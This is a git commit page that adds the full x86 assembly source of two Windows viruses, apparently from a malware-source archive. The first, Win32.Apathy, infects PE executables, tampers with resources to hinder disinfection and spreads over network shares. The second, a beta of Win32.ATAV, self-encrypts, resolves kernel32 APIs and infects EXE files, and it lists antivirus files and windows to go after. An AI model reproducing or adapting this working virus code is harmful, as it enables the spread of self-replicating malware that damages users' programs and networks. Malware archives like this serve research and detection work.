Updated dir structure in Win32

TheDuchy
2020-10-16 23:26:21 +02:00
parent b022d14189
commit cfc6699241
173 changed files with 0 additions and 0 deletions
+825
@@ -0,0 +1,825 @@
;
; - Win32.Apathy -
; -b0z0/iKX-
;
; This is a PE infector that works in 9x/NT systems and infected files in
; that enviroments will work correctly after infection (I'm not sure that
; there is a secret bu... feature that could make them not to work).
; While infecting Win32.Apathy will overwrite the original PE start with
; a copy of itself, thus avoiding entirely the API searching problem,
; saving the original piece of code at the end of the infected file. To
; maintain compatibility with NT and to make disinfection a little tricky
; the virus will also change the .rsrc RVA and consequently all the resource
; entryes to some standard position. So just copying the original piece of
; will result in damaging the executable. The original file will be
; reconstructed in a temporary file and executed there as a new process.
; Check code for other things about the infection process and such.
; Win32.Apathy will also try to spread through the network (microsoft
; network or SMB or how you wanna call it) by scanning some connected
; resources and trying to infect files over there.
;
; The virus has been quite tested under Win95/98/NT4
;
; Win32.Apathy born really a lot of time ago, I started coding this just
; after Xine#3 was out, but then the whole project (like all my other VX
; projects) was stopped until about december 1998 when I decided to finish
; at least something. The code tho is not optimized at all, could not be
; too clear in some parts, I just wanted to materialize a few ideas I had
; and I didn't really care too much to optimize or something this.
;
; The virus name is quite obvious, but:
; apathy: the state of having no wish to act and no enthusiasm
;
; Thanx to StarZero for cool hints and notes!
;
; For any kind of info or something contact me at cl0wn@geocities.com
;
.386
.model flat
; kernel32 ones we need
extrn SetFileAttributesA:PROC
extrn Sleep:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetTickCount:PROC
extrn lstrcpy:PROC
extrn ExitProcess:PROC
extrn SetFileTime:PROC
extrn DeleteFileA:PROC
extrn GetTempPathA:PROC
extrn GetTempFileNameA:PROC
extrn CreateProcessA:PROC
extrn CopyFileA:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn GetCommandLineA:PROC
extrn CloseHandle:PROC
extrn ReadFile:PROC
extrn HeapAlloc:PROC
extrn GetProcessHeap:PROC
extrn CreateFileA:PROC
extrn CreateFileMappingA:PROC
extrn MapViewOfFile:PROC
extrn UnmapViewOfFile:PROC
extrn GetFileSize:PROC
extrn CreateMutexA:PROC
extrn GetLastError:PROC
; for network from mpr.dll
extrn WNetOpenEnumA:PROC
extrn WNetEnumResourceA:PROC
.data
vname db 0,'Win32.Apathy by '
author db '-b0z0/iKX-',0 ; used as mutex object name
fsearch:
f_attrib dd 00h
f_ctime dd 00h,00h
f_atime dd 00h,00h
f_wtime dd 00h,00h
f_size_hi dd 00h
f_size_lo dd 00h
f_reserved dd 00h,00h
f_name db 104h dup (?)
f_alt_name db 0eh dup (?)
msg db 'i am nobody except genetic runaround',0
ff_handle dd 00h
f_handle dd 00h
dotdot_mask db '..',0
exemask db '*.EXE',0
v_map_handle dd 00h
v_file_handle dd 00h
orig_virus_p dd 00h
pref db 'ikx',0 ; tmp file name prefix
path_position dd offset new_path
new_path db 112h dup (?) ; max_path + a bit more
tmp_name db 112h dup (?)
process_info dd 4 dup (?)
; STARTUPINFO structure for new process
startup_info dd 10h ; lenght of this structure
dd 00h,00h
title_startup dd 00h ; pointer to title for console progs
;
has_infected db 00h ; 00h no, 01h yes
virus_phase db 07h ; 07h infecting .
; 06h infecting windows directory
; 05h infecting network 1 try
; 04h infecting network 2 try
; 03h infecting ..
; 02h infecting network 3 try
; 01h infecting network 4 try
netspace equ 4000h ; 16kb as suggested. place for 200h
; entryes... way too much anyway
enum_handle dd 00h ; handle of Net enumeration
enum_count dd 1ffh ; how many got / how many to get
enum_size dd netspace ; size of memory avaiable for results
r_point dd 0h
; here begins the virus code
.code
; equs
exesize equ 1502h ; size of virus executable
pe_begin equ 100h ; where PE header begins in virus
file_align equ 200h ; file align value (= to linker one)
read_exe equ 4096d ; how much victim to read to check
marker equ '0z0b' ; infection marker
wait_time equ 2604d ; time between each search
sleep_time equ 7919d ; add sleep time after good infection
f_shit equ 2000h ; first gen dim
; the marker must be set at offset 58h of the PE once compiled
startcode:
call GetProcessHeap
push (exesize + read_exe + netspace)
push 8h ; zero memory
push eax
call HeapAlloc ; allocate some memory from our heap
mov dword ptr [orig_virus_p],eax
push offset new_path
push 112h
call GetTempPathA
push offset tmp_name ; create a temporary name
push large 0
push offset pref
push offset new_path
call GetTempFileNameA
call GetCommandLineA ; get our name
cmp byte ptr [eax],22h ; " this is strange, sometimes cmdline
jne not_thatshit ; is enclosed in "", so we must take
inc eax ; care if they are there
push eax
find_ending:
cmp byte ptr [eax],22h
je delete_ending_aswell
inc eax
jmp find_ending
delete_ending_aswell:
mov byte ptr [eax],20h
pop eax
not_thatshit:
push eax
mov dword ptr [title_startup],eax
search_end:
inc eax
cmp byte ptr [eax-1],'.' ; go to the extension
jne search_end
cmp byte ptr [eax+3],20h ; space
je found_end
cmp byte ptr [eax+3],00h ; end of string
jne search_end
found_end:
add eax,3 ; point on end of exe name
push eax
push eax ; copy possible command line options
push offset new_path ; to the buffer
call lstrcpy
pop eax
mov byte ptr [eax],0 ; put null to open/copy it
pop eax
push large 0
push offset tmp_name
push eax ; copy ourselves to another name
call CopyFileA
or eax,eax
jz exit_critical_temp
push 02h ; file attribute hidden
push offset tmp_name
call SetFileAttributesA
xor eax,eax
push eax
push large 80h
push large 3
push eax
push eax
push 0c0000000h ; readwrite
push offset tmp_name ; open the temporary file
call CreateFileA
inc eax ; check if opened ok
jz exit_critical_temp
dec eax
mov dword ptr [v_file_handle],eax
push eax
push large 0
push eax ; handle
call GetFileSize ; get size of file we are running from
xchg ecx,eax ; copied in a tmp file
pop eax
push ecx ; size
xor ecx,ecx
push ecx
push ecx ; entire file
push ecx
push large 04h
push ecx
push eax
call CreateFileMappingA
cdq
or eax,eax
jz exit_critical_temp ; eax map handle
push eax ; mapping handle
push edx
push edx
push edx
push large 02h
push eax
call MapViewOfFile
or eax,eax
pop ebx ; mapping handle
je exit_critical_temp
cld
mov esi,eax
mov edi,dword ptr [orig_virus_p]
mov ecx,exesize
mov edx,ecx
rep movsb
pop ecx ; size
cmp ecx,f_shit
jz first_generation
sub ecx,edx
sub ecx,edx
push ebx ; map handle
mov edi,esi
add esi,ecx
mov ecx,edx
sub edi,ecx
push edi ; to beginning of file mapping in mem
push edi
rep movsb ; restore original
pop edi
mov esi,edi ; now we must restore the resources
add edi,dword ptr [edi+3ch] ; on PE
mov eax,dword ptr [edi+8ch] ; resources lenght
or eax,eax
jz no_resourz
mov eax,dword ptr [edi+88h] ; resources RVA
add edi,0f8h+0ch ; to objects
srs_loo:
cmp eax,dword ptr [edi] ; is the resources one?
je got_srsr
add edi,28h ; lenght of an object
jmp srs_loo
got_srsr:
add esi,dword ptr [edi+08h] ; physical offset of resources
mov ebx,4000h ; fixed virus resources RVA
sub ebx,eax
call rsrs_change ; call changer
no_resourz: ; everything is ready again
call UnmapViewOfFile
call CloseHandle
push dword ptr [v_file_handle] ; close virus file
call CloseHandle
xor eax,eax
push offset process_info
push offset startup_info
push eax
push eax
push eax
push eax
push eax
push eax
push offset new_path ; to command line options
push offset tmp_name ; to file to execute
call CreateProcessA ; run host executable
first_generation:
push offset author ; name of the mutex object
push large 1
push large 0
call CreateMutexA ; create one
call GetLastError ; check if one with the same name
or eax,eax ; already exist. if so virus is already
jnz exit_critical_temp ; running as another process
mov eax,offset exemask
search_loop:
push offset fsearch
push eax
call FindFirstFileA ; search for some victims
cmp eax,-1
je end_file_search
mov dword ptr [ff_handle],eax
infect_file:
push offset f_name
push dword ptr [path_position] ; copy found file
call lstrcpy ; after directory
push 80h ; FILE_ATTRIBUTE_NORMAL
push offset new_path
call SetFileAttributesA ; delete attributes
or eax,eax
jz error_attributes
xor eax,eax
push eax
push large 80h
push large 3
push eax
push eax
push 0c0000000h ; readwrite
push offset new_path ; full file name to file to
call CreateFileA ; infect
inc eax
jz error_opening
dec eax
mov dword ptr [f_handle],eax
push eax
mov edx,dword ptr [orig_virus_p] ; virus heap
add edx,exesize ; read data is after original
push edx
push large 0
push offset f_size_hi ; some place to store nr of
push read_exe ; readed bytes
push edx
push eax
call ReadFile ; read header
pop edx
pop eax
cmp word ptr [edx],'ZM' ; exe?
jne not_to_infect
mov ecx,dword ptr [edx+3ch] ; pointer to PE header
cmp ecx,(read_exe - 4) ; is the PE header in readed
jae not_to_infect ; chunk of executable?
add edx,ecx
cmp dword ptr [edx],'EP'
jne not_to_infect
cmp dword ptr [edx+58h],marker ; already infected?
je not_to_infect
test dword ptr [edx+3ch],(file_align - 1)
jnz not_to_infect ; must have an align cmptible
mov ecx,dword ptr [f_size_lo] ; file size (assume <= 4gb)
cmp ecx,(10 * 1024) ; not too small files
jbe not_to_infect ; leave it
mov ebx,dword ptr [edx+8ch] ; resource size
or ebx,ebx
jz no_resp
mov ebx,dword ptr [edx+88h] ; pointer to resources
add edx,(0f8h + 0ch)
search_rsrcs:
cmp ebx,dword ptr [edx] ; is the resources one?
je got_rsrcs
add edx,28h ; lenght of an object
jmp search_rsrcs
got_rsrcs:
sub edx,0ch ; on beginning of this object
cmp dword ptr [edx+14h],exesize ; are resources after the virus
jbe not_to_infect ; size (this is won't be overw)
mov ebx,edx
no_resp:
mov dword ptr [r_point],ebx
add ecx,exesize ; will extend it by exesize
xor edx,edx
push edx
push ecx
push edx
push large 04h
push edx
push eax
call CreateFileMappingA
cdq
or eax,eax
jz not_to_infect
mov dword ptr [v_map_handle],eax
push edx
push edx
push edx
push large 02h
push eax
call MapViewOfFile
or eax,eax
jz close_map_exit
mov edi,eax
push edi
mov esi,edi
add edi,dword ptr [f_size_lo]
mov edx,edi
mov ecx,exesize ; save original code after the end
push ecx
rep movsb
pop ecx
pop edi
push edi
mov esi,dword ptr [orig_virus_p] ; on vir
rep movsb ; copy virus body
pop edi
push edi
mov esi,edx
mov edx,edi
add esi,dword ptr [esi+3ch] ; on PE
mov ecx,4000h ; image size of virus file w/o rsrcs
mov dword ptr [edi+pe_begin+50h],ecx ; correct image size
mov word ptr [edi+pe_begin+6],3h ; number of virus objects
mov eax,dword ptr [r_point] ; pointer to resources object
mov ebx,dword ptr [esi+8ch] ; resource size
mov dword ptr [edi+pe_begin+8ch],ebx
mov dword ptr [edi+pe_begin+88h],0h ; zero resurce RVA by default
or eax,eax ; resources length 0?
jz no_resources
mov ebx,dword ptr [esi+88h] ; resource RVA
sub ebx,ecx
mov dword ptr [edi+pe_begin+88h],ecx ; set resources pointer
inc word ptr [edi+pe_begin+6] ; number of objects
mov esi,eax ; on resources object
add edi,(pe_begin + 0f8h + (3*28h))
mov ecx,028h ; copy resources object
rep movsb
mov esi,edx ; on beginning of file
mov dword ptr [edi-28h+0ch],4000h
mov eax,dword ptr [edi-28h+08h] ; object virtual size
add eax,(1000h - 1)
and eax,0fffff000h
add dword ptr [edi - (0f8h + (4*28h)) + 50h],eax ; to image size
mov eax,dword ptr [edi-28h+14h] ; physical offset of resources
add esi,eax
call rsrs_change ; change those
no_resources:
call UnmapViewOfFile ; unmap view of file
inc byte ptr [has_infected] ; good infection, so a pause
; will occour
close_map_exit:
push dword ptr [v_map_handle]
call CloseHandle ; close mapping handle
mov eax,dword ptr [f_handle]
push eax
push offset f_wtime
push offset f_atime
push offset f_ctime
push eax
call SetFileTime ; restore original file time
pop eax
not_to_infect:
push eax ; file handle
call CloseHandle ; close infected file
error_opening:
push dword ptr [f_attrib] ; restore old attributes to file
push offset new_path
call SetFileAttributesA
error_attributes:
mov eax,wait_time ; so it won't work too much
dec byte ptr [has_infected]
jnz no_infection
add eax,sleep_time ; if a file was infected then make a
; longer pause
no_infection:
push eax
call Sleep ; pause until next one
mov byte ptr [has_infected],00h ; reset infection mark
push offset fsearch
push dword ptr [ff_handle]
call FindNextFileA
or eax,eax ; no more files?
jz end_file_search
jmp infect_file ; else infect
end_file_search:
call GetTickCount ; should we go deeper in dir
shr eax,1 ; from actual position?
jc next_phase
mov esi,dword ptr [path_position] ; search from last dir fwd
mov dword ptr [esi],' .*' ; to search dirs and such
push eax
push offset fsearch
push offset new_path
call FindFirstFileA
mov dword ptr [ff_handle],eax
cmp eax,-1
pop eax
je next_phase ; no dirs in here
check_dir:
test dword ptr [f_attrib],10h ; is a directory?
jz search_next_dir
cmp byte ptr [f_name],'.' ; not . or ..
je search_next_dir
shr eax,1 ; select randomly if walk into
jnc search_next_dir ; this or try another
mov eax,dword ptr [path_position] ; put after actual search path
mov esi,offset f_name ; point to directory name
jmp copy_from_eax
search_next_dir:
push eax
push offset fsearch
push dword ptr [ff_handle] ; search next
call FindNextFileA
or eax,eax ; no more directoryes?
pop eax
jnz check_dir
next_phase:
dec byte ptr [virus_phase]
mov al,byte ptr [virus_phase]
or al,al ; phases finished
jz farewell_and_goodnight
cmp al,03h ; search in ..
je search_dotdot
cmp al,06h ; windows directory phase
jne network_work
mov esi,offset new_path
push 104h ; buffer lenght
push esi ; search in windoze directory
call GetWindowsDirectoryA
jmp copy_and_gosearch
search_dotdot:
mov esi,offset dotdot_mask
jmp copy_and_gosearch
network_work:
xor ebx,ebx
find_resource:
push offset enum_handle
push ebx ; pointer to NETSOURCE structure to use
push large 3 ; CONNECTABLE | CONTAINER
push large 1 ; RESOURCETYPE_DISK
push large 2 ; RESOURCE_GLOBALNET
call WNetOpenEnumA
or eax,eax ; 0 = NO_ERROR
jnz next_phase ; on error just skip this phase
mov eax,dword ptr [orig_virus_p] ; pointer to heap
add eax,(exesize + read_exe) ; after other data
mov dword ptr [enum_count],1ffh ; get max entryes
push eax
push offset enum_size ; avaiable memory for results
push eax ; where to place results
push offset enum_count ; how many to enumerate
push dword ptr [enum_handle] ; handle of enumeration
call WNetEnumResourceA
pop ebx
or eax,eax ; 0 = NO_ERROR
jnz next_phase ; if some error skip
mov ecx,dword ptr [enum_count] ; number of entryes got
call GetTickCount ; random
xor edx,edx
div ecx
mov eax,20h ; lenght of one entry
mul edx ; select which one
add ebx,eax
test dword ptr [ebx+0ch],01h ; is an usable resource
jz find_resource
; if not should be a container
; (local or remote) so continue
; to next level
got_resource:
mov esi,dword ptr [ebx+14h] ; here it is
copy_and_gosearch:
mov eax,offset new_path
copy_from_eax:
push eax
push esi ; path to network or dir
push eax ; where to copy
call lstrcpy
pop eax
loop_searchzero:
cmp byte ptr [eax],00h
je got_null_termination ; find end
inc eax
jmp loop_searchzero
got_null_termination:
mov byte ptr [eax],'\' ; add \
inc eax
mov dword ptr [path_position],eax
push offset exemask ; and now copy the *.exe mask
push eax
call lstrcpy
mov eax,offset new_path
jmp search_loop
farewell_and_goodnight:
exit_critical_temp:
; before exiting delete some temp files (the still used ones will be deleted
; next time since are actually in use)
mov esi,offset tmp_name ; has temp path + last temp name
search_dottmp:
inc esi
cmp word ptr [esi],'i\' ; find beginning of name
jne search_dottmp
inc esi
inc esi
cmp word ptr [esi],'xk'
jne search_dottmp
got_end:
inc esi
inc esi
push esi
mov dword ptr [esi],'mt.*' ; set delete ikx*.tmp
mov word ptr [esi+4],'p' ; p + null termination
push offset fsearch
push offset tmp_name
call FindFirstFileA
pop edi ; after ikx in temp name
cmp eax,-1
je exit_deletion
delete_temps:
mov esi,(offset f_name + 3)
mov ecx,9h ; sometimes will be shorter but wc
push edi
rep movsb
pop edi
push eax ; preserve handle
push offset tmp_name
call DeleteFileA ; could fail if file is
pop eax ; used, but np
push eax
push offset fsearch
push eax
call FindNextFileA ; find next to delete
or eax,eax
pop eax
jnz delete_temps
exit_deletion:
exit:
push LARGE -1 ; that's all, will release also
call ExitProcess ; our mutex object
rsrs_change:
; EBX = value to substract to each resource element
; ESI = pointer to resources
xor edx,edx ; will keep number of data elements
push ebx
search_rsr:
add esi,10h
movzx ecx,word ptr [esi - 2] ; nr of named and integer
add cx,word ptr [esi - 4] ; entryes in this dir
adc ecx,0
na_nasl:
mov ebx,dword ptr [esi + 4]
test ebx,80000000h ; is a resource data entry?
jnz is_subdir
inc edx
is_subdir:
add esi,8 ; on next
loop na_nasl
cmp dword ptr [esi],00h ; finished ?
je search_rsr
pop ebx
mov ecx,edx
change_res:
sub dword ptr [esi],ebx ; sub requested value
add esi,10h
loop change_res ; change all entryes
ret
end startcode
+760
@@ -0,0 +1,760 @@
;-------------------------------
;Fuck Beta virus Atav by Radix16
;-------------------------------
;Tak tohle je mozna prvni verze viru Atav ,nevim to jiste protoze se mi gdesi stratila.
;Sami negdy uvidite zdrojak plne verze se hodne lisi s timhle TOHLE JE LAMME fuj!
;Uz se na toto nemuzu ani divat ,nestojito ani za popis :)
;
;Nova verze mela by obsahovat : Poly , Update Internet , Fast infection .Ring3 -> Ring0
;Takgze i nejake novinky pro svet :) ,ale jinac se presouvam i na LINUX :)))
;
;Zatim Zdar :)
.386p
.Model Flat
jumps
.Data
db ?
extrn GetModuleHandleA :proc
extrn ExitProcess :proc
extrn MessageBoxA :proc
VirusSize equ Virus_End-Start
SizeCrypt equ Crypt_End-Crypto
include mz.inc
include pe.inc ;include files from Jacky Qwerty/29A
include win32api.inc
include useful.inc
;////////////////////////////M Y C O D E ///////////////////////////////////////////////////////
.Code
Virus_Size equ Virus_End-Start
Start:
pushad
@SEH_SetupFrame <jmp seh_fn>
xchg [edx], eax
seh_fn:
call Base1
Base1:
pop ebp
sub ebp,offset Base1
FirstGeneration:
call Mutate1
Crypto:
Virus_Start:
call Kernel?
mov esi, ebx
mov ebx,[esi+10h]
add ebx,[ebp + imagebase]
mov [ebp + offset f_RVA],ebx
mov eax,[esi]
jz Not_Found_Kernel32
mov esi,[esi]
add esi,[ebp + offset imagebase]
mov edx,esi
mov ecx,[ebp+offset importsize]
mov eax,0
Jmp Get_Module_Handle
coded db 'Win32.ATAV (c)oded by Radix16[MIONS]',0
maintext db 'Heayaaa',0
Kernel?:
mov esi,[ebp + offset imagebase]
cmp word ptr[esi],'ZM'
jne GetEnd
add esi,3ch
mov esi,[esi]
add esi,[ebp + offset imagebase]
push esi
cmp word ptr [esi], 'EP' ;Win App PE
jne GetEnd
add esi, 28h
mov eax, [esi]
mov [ebp+entrypoint], eax
pop esi
add esi,80h
mov eax,[esi]
mov [ebp+importvirtual],eax
mov eax,[esi+4]
mov [ebp+importsize],eax
mov esi,[ebp+importvirtual]
add esi,[ebp + offset imagebase]
mov ebx,esi
mov edx,esi
add edx,[ebp + importsize]
Search_Kernel:
mov esi,[esi + 0ch]
add esi,[ebp + offset imagebase]
cmp [esi],swKernel32
Je K32Found
add ebx, 14h
mov esi, ebx
cmp esi, edx
jg Not_Found_Kernel32
jmp Search_Kernel
K32Found:
ret
Not_Found_Kernel32:
mov eax, dword ptr [esp]
find_base_loop:
cmp dword ptr [eax+0b4h], eax
je Found_Adress
dec eax
cmp eax, 40000000h
jbe assume_hardcoded
jmp find_base_loop
assume_hardcoded:
mov eax, 0BFF70000h
cmp word ptr [eax], 'ZM'
je Found_Adress
mov eax, 07FFF0000h
Found_Adress:
mov [ebp+offset Kernel32], eax ;Mam ju :))
mov edi, eax
cmp word ptr [edi],'ZM'
jne GetEnd
mov edi, [edi+3ch]
add edi, [ebp+offset Kernel32]
cmp word ptr [edi],'EP'
jne GetEnd
pushad
mov esi,[edi+78H]
add esi,[ebp+offset Kernel32]
mov [ebp+offset Export],esi
add esi,10H
lodsd
mov [ebp+offset basef],eax
lodsd
lodsd
mov [ebp+offset limit],eax
add eax, [ebp+offset Kernel32]
lodsd
add eax,[ebp+offset Kernel32]
mov [ebp+offset AddFunc],eax
lodsd
add eax, [ebp+offset Kernel32]
mov [ebp+offset AddName],eax
lodsd
add eax,[ebp+offset Kernel32]
mov [ebp+offset AddOrd],eax
mov esi,[ebp+offset AddFunc]
lodsd
add eax,[ebp+offset Kernel32]
mov esi, [ebp+offset AddName]
mov [ebp+offset Nindex], esi
mov edi,[esi]
add edi,[ebp+offset Kernel32]
mov ecx,0
mov ebx,offset API_NAMES
add ebx,ebp
TryAgain:
mov esi,ebx
MatchByte:
cmpsb
jne NextOne
cmp byte ptr [edi], 0
je GotIt
jmp MatchByte
NextOne:
inc cx
cmp cx, word ptr [ebp+offset limit]
jge GetEnd
add dword ptr [ebp+offset Nindex], 4
mov esi, [ebp+offset Nindex]
mov edi, [esi]
add edi, [ebp+offset Kernel32]
jmp TryAgain
GotIt:
mov ebx,esi
inc ebx
shl ecx,1
mov esi, [ebp+offset AddOrd]
add esi,ecx
xor eax,eax
mov ax,word ptr [esi]
shl eax, 2
mov esi,[ebp+offset AddFunc]
add esi,eax
mov edi,dword ptr [esi]
add edi,[ebp+offset Kernel32]
mov [ebp+offset ddGetProcAddress], edi
popad
mov esi, offset swExitProcess
mov edi, offset ddExitProcess
add esi, ebp
add edi, ebp
Repeat_find_apis:
push esi
mov eax,[ebp+offset Kernel32]
push eax
mov eax,[ebp+offset ddGetProcAddress]
call eax
cmp eax,0
je GetEnd
stosd
repeat_inc:
inc esi
cmp byte ptr [esi], 0
jne repeat_inc
inc esi
cmp byte ptr [esi], 0FAh
jne Repeat_find_apis
Jmp Virus_Game
Get_Module_Handle:
cmp dword ptr [edx],0
je Not_Found_Kernel32
cmp byte ptr [edx+3],80h
je Not_Here
mov esi,[edx]
push ecx
add esi,[ebp + offset imagebase]
add esi,2
mov edi,offset gmhGetModuleHandleA
add edi,ebp
mov ecx,gmhsize
rep cmpsb
pop ecx
je f_GetModuleHandelA
Not_Here:
inc eax
add edx,4
loop Get_Module_Handle
jmp Not_Found_Kernel32
f_GetModuleHandelA:
shl eax,2
mov ebx,[ebp+offset f_RVA]
add eax,ebx
mov eax,[eax]
mov edx,offset se_Kernel32
add edx,ebp
push edx
call eax
cmp eax,0
jne Found_Adress
Jmp Not_Found_Kernel32
Virus_Game:
push offset SystemTime
mov eax,[ebp + ddGetSystemTime]
call eax
cmp byte ptr [SystemTime.wMonth],0Ah
jne Next_Game
cmp byte ptr [SystemTime.wDay],0Fh
jne Next_Game
jmp Ok_Day_Month
Next_Game:
mov dword ptr [ebp+offset infections], 0Ah
call SearchFiles
inc eax
jz GetEnd
dec eax
push eax
mov ecx,[edi.FileSizeLow] ;zisti velikost souboru
lea esi,[edi.FileName]
call Infect
jc _try
dec dword ptr [ebp+offset infections]
cmp word ptr [ebp+offset infections], 0
je All_Done
_try:
push edi
lea edi, [edi.FileName]
mov ecx, 13d
mov al, 0
rep stosb
pop edi
pop eax
push eax
push edi
push eax
call dword ptr [ebp+offset ddFindNextFileA]
test eax,eax
jz All_Done
mov ecx,[edi.FileSizeLow] ;zisti velikost souboru
lea esi,[edi.FileName]
call Infect
jc failinfection
dec dword ptr [ebp+infections]
failinfection:
cmp dword ptr [ebp+infections], 0
jne _try
All_Done:
pop eax
GetEnd:
cmp ebp, 0
je _exit
mov eax,[ebp + offset oldip]
add eax,[ebp + offset imagebase]
jmp eax
_exit:
push 0
mov eax, [ebp+offset ddExitProcess]
call eax
PEheader dd 0
oldip dd 0
oldsize dd 0
newsize dd 0
incsize dd 0
newip dd 0
Infect proc
pushad
add ecx,VirusSize ;pricti virus k souboru
mov word ptr [ebp+infectionflag], 0
mov [ebp + offset memory],ecx ; nastav max velikost pro mapovani souboru
call OpenFile ;volej funkci pro otevreni souboru
mov [ebp+offset filehandle], eax ;
inc eax ; eax -1
jz Endus ; chyba? jestli ne tak jed dal
call CMapFile
or eax,eax
jz Endus
call MapView
or eax,eax
jz Exit_Map
mov esi,eax
mov [ebp+offset mapaddress],esi
cmp word ptr[esi],'ZM' ;Zacina typickymi znaky jako EXE
jne UnMapw
mov ebx,dword ptr[esi+3ch]
cmp word ptr [esi+ebx],'EP' ;Je to PE
jne UnMapw
add esi,ebx
mov [PEheader+ebp], esi
mov eax, [esi+28h]
mov [oldip+ebp],eax ;Uloz skok
mov eax,[esi+3ch]
push eax
xor eax, eax
mov ebx,[esi+74h]
shl ebx,3
mov ax,word ptr [esi+6h]
dec eax
mov ecx,28h
mul ecx
add esi,78h
add esi,ebx
add esi,eax
or dword ptr ds:[esi+24h],0A0000020h
mov eax,[esi+10h]
mov [oldsize+ebp],eax
add dword ptr [esi+8h],VirusSize
mov eax,[esi+8h]
pop ebx
mov ecx,ebx
div ecx
mov ecx,ebx
sub ecx,edx
mov [esi+10h],ecx
mov eax,[esi+8h]
add eax,[esi+10h]
mov [esi+10h],eax
mov [ebp+offset newsize], eax
mov eax,[esi+0ch]
add eax,[esi+8h]
sub eax,VirusSize
mov [newip+ebp],eax
mov eax,[ebp+offset oldsize]
mov ebx,[ebp+offset newsize]
sub ebx,eax
mov [ebp+offset incsize], ebx
mov eax,[esi+14h]
add eax,[ebp+offset newsize]
mov [ebp+offset newfilesize], eax
mov eax, [esi+14h]
add eax,[esi+8h]
sub eax,VirusSize
add eax,[ebp+offset mapaddress]
call Write_File
mov esi,[ebp+offset PEheader]
mov eax,[newip+ebp]
mov [esi+28h],eax
mov eax, [ebp+offset incsize]
add [esi+50h], eax
UnMapw:
push dword ptr [ebp+offset mapaddress]
mov eax, [ddUnmapViewOfFile+ebp]
Call eax
Exit_Map:
push dword ptr [ebp+offset maphandle]
mov eax,[ddCloseHandle+ebp]
call eax
push dword ptr [ebp+offset filehandle]
mov eax, [ddCloseHandle+ebp]
call eax
Jmp Complete?
infection_error:
stc
jmp Endus
Complete?:
cmp word ptr [ebp+offset infectionflag], 0FFh
je infection_error
clc
Endus:
popad
ret
Infect endp
SearchFilesN proc
ret
SearchFilesN endp
SearchFiles proc
lea edi,[ebp + offset search]
mov eax,edi
push eax
lea eax,[ebp + offset _Exe]
push eax
call dword ptr[ebp+offset ddFindFirstFileA]
ret
SearchFiles endp
memory dd 0
maphandle dd 0
mapaddress dd 0
CMapFile proc
push 0
push dword ptr [ebp+offset memory] ; max.velikost
push 0
push PAGE_READWRITE ;R/W
push 0
push dword ptr [ebp+offset filehandle] ;handle
mov eax,dword ptr [ddCreateFileMappingA+ebp]
call eax
mov [ebp+offset maphandle], eax ;uloz map.handle
ret
CMapFile endp
MapView proc
push dword ptr [ebp+offset memory]
push 0
push 0
push FILE_MAP_ALL_ACCESS
push eax
mov eax,[ddMapViewOfFile+ebp]
call eax
ret
MapView endp
filehandle dd 0 ;rukojet souboru
OpenFile proc
push 0 ;Atributy
push 0
push 3 ;Otevri existuji soubor
push 0
push 1
push 80000000h or 40000000h ;read a write
push esi ;jmeno souboru
mov eax, [ddCreateFileA+ebp] ;
Call eax ;volej
ret ;zpet
OpenFile endp ;v eax je rukojet souboru
Kick_AV proc
push eax
cdq
push edx
; call FindWindowA
xchg eax, ecx
jecxz quit
push edx
push edx
push 12h
push ecx
; call PostMessageA
quit:
ret
Kick_AV endp
Delete_AV proc
Delete_AV endp
Ok_Day_Month:
;////////////////D A T A ////////////////////////////////////////////////////////////////////////
nop
imagebase dd 00400000h
swKernel32 = 'NREK'
Kernel32 dd 00000000h
importvirtual dd ?
importsize dd ?
entrypoint dd ?
f_RVA dd ?
Nindex dd 0
basef dd 0
Export dd 0
limit dd 0
AddFunc dd 0
AddName dd 0
AddOrd dd 0
newfilesize dd 0
infectionflag dw 0
gmhGetModuleHandleA db 'GetModuleHandleA',0
gmhsize = $-gmhGetModuleHandleA
API_NAMES:
swGetProcAddress db 'GetProcAddress',0
swExitProcess db 'ExitProcess',0
swGetVersion db 'GetVersion',0
swFindFirstFileA db 'FindFirstFileA',0
swFindNextFileA db 'FindNextFileA',0
swGetCurrentDirectory db 'GetCurrentDirectoryA',0
swSetCurrentDirectory db 'SetCurrentDirectoryA',0
swDeleteFile db 'DeleteFileA',0
swCreateFileMapping db 'CreateFileMappingA',0
swMapViewOfFile db 'MapViewOfFile',0
swUnmapViewOfFile db 'UnmapViewOfFile',0
swGetFileAttributes db 'GetFileAttributesA',0
swSetFileAttributes db 'SetFileAttributesA',0
swGetDriveType db 'GetDriveTypeA',0
swCreateFile db 'CreateFileA',0
swCloseHandle db 'CloseHandle',0
swGetFileTime db 'GetFileTime',0
swSetFileTime db 'SetFileTime',0
swSetFilePointer db 'SetFilePointer',0
swGetFileSize db 'GetFileSize',0
swSetEndOfFile db 'SetEndOfFile',0
swGetSystemTime db 'GetSystemTime',0
swGetModuleHandle db 'GetModuleHandleA',0
swWriteFile db 'WriteFile',0
db 0FAh
ddGetProcAddress dd 0
ddExitProcess dd 0
ddGetVersion dd 0
ddFindFirstFileA dd 0
ddFindNextFileA dd 0
ddGetCurrentDirectoryA dd 0
ddSetCurrentDirectoryA dd 0
ddDeleteFileA dd 0
ddCreateFileMappingA dd 0
ddMapViewOfFile dd 0
ddUnmapViewOfFile dd 0
ddGetFileAttributesA dd 0
ddSetFileAttributesA dd 0
ddGetDriveTypeA dd 0
ddCreateFileA dd 0
ddCloseHandle dd 0
ddGetFileTime dd 0
ddSetFileTime dd 0
ddSetFilePointer dd 0
ddGetFileSize dd 0
ddSetEndOfFile dd 0
ddGetSystemTime dd 0
ddGetModuleHandleA dd 0
ddWriteFile dd 0
max_path EQU 260
se_Kernel32 db 'KERNEL32.dll',0
Anti_AV:
_Grisoft db 'avg?????.dat',0
_AVP db 'AVP.CRC',0
_TBAW db 'anti-vir.dat',0
_MSAV db 'CHKLIST.MS',0
_Kaspersky_ db 'AVP Monitor',0
_Grisoft_ db 'AVG Control Center',0
_Exe db '*.EXE',0
infections dd 0
fnx dd 0
Crypt_End:
Mutate1:
mov ecx,SizeCrypt
lea esi,[ebp + Crypto]
decr:
xor dword ptr [esi],0FFh
inc esi
loop decr
End_Mutate:
ret
Write_File proc
call Mutate1
mov edi, eax
lea esi,[Start+ebp]
mov ecx, VirusSize
rep movsb
call Mutate1
ret
Write_File endp
Virus_End:
SYSTEMTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMilliseconds WORD ?
ends
filetime STRUC
FT_dwLowDateTime DD ?
